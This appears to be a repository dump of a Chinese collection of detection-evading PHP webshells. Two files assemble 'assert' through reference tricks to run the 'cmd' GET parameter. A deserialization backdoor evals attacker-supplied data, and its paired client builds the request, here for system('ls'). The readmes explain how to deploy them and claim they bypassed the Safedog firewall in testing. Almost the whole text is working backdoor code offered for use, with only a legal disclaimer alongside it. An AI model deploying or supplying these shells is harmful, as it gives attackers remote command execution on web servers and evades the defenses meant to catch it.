├── php
    ├── &
    │   ├── &1.php
    │   ├── &2.php
    │   └── readme.md
    └── unserialize
    │   ├── readme.md
    │   ├── serializeDoor-Client.php
    │   └── unserializeDoor-Server.php
└── readme.md


/php/&/&1.php:
--------------------------------------------------------------------------------
1 | <?php
2 | function foo(&$var)
3 | {
4 |     $var=$var.'t';
5 | }
6 | $a="asser";
7 | foo($a);
8 | $a($_GET[cmd]);
9 | 


--------------------------------------------------------------------------------
/php/&/&2.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | class talker{
 3 |     public $data = 'Hi';
 4 |     public function & get(){
 5 |         return $this->data;
 6 |     }
 7 | }
 8 | 
 9 | $aa = new talker();
10 | $d = &$aa->get();
11 | $d = $_GET[cmd];
12 | 
13 | function foo(&$var)
14 | {
15 |     $var=$var.'t';
16 | }
17 | $a="asser";
18 | foo($a);
19 | $a($aa->data);
20 | 
21 | 


--------------------------------------------------------------------------------
/php/&/readme.md:
--------------------------------------------------------------------------------
1 | &1.php  
2 | 利用函数的的参数引用免杀  
3 | &2.php  
4 | 在1的基础上再利用函数的返回免杀  
5 | 
6 | 两个免杀webshell都是assert类型的webshell,pass:cmd
7 | 


--------------------------------------------------------------------------------
/php/unserialize/readme.md:
--------------------------------------------------------------------------------
1 | ## usage
2 | 
3 | 将unserializeDoor-Server.php传到服务器上,在本地运行serializeDoor-Client.php,根据提示访问对应url,
4 | 如果需要执行其他php代码则在serializeDoor-Client.php中修改代码再在本地运行serializeDoor-Client.php
5 | 


--------------------------------------------------------------------------------
/php/unserialize/serializeDoor-Client.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | class foo{
 4 |     #public $data="phpinfo();";
 5 |     public $data="system('ls');";
 6 | }
 7 | $a=new foo;
 8 | $b=serialize($a);
 9 | echo "please visit uri:\n"."[your shell page url]"."?id=".$b;
10 | 


--------------------------------------------------------------------------------
/php/unserialize/unserializeDoor-Server.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | class foo{
 4 |     public $data="text";
 5 |     function __destruct()
 6 |     {
 7 |         eval($this->data);
 8 |     }
 9 | }
10 | 
11 | $file_name=$_GET['id'];
12 | unserialize($file_name);
13 | 


--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
1 | ## 免杀webshell集合
2 | 
3 | [!] 法律免责声明：未经事先相互同意，使用本程序攻击目标是非法的。使用本程序的最终用户有责任遵守所有适用的地方、国家法律。开发人员对本程序造成的任何误用、滥用、非法使用不承担任何责任。
4 | 
5 | 这里的免杀webshell都在测试时绕过了安全狗,不保证永久免杀
6 | 


--------------------------------------------------------------------------------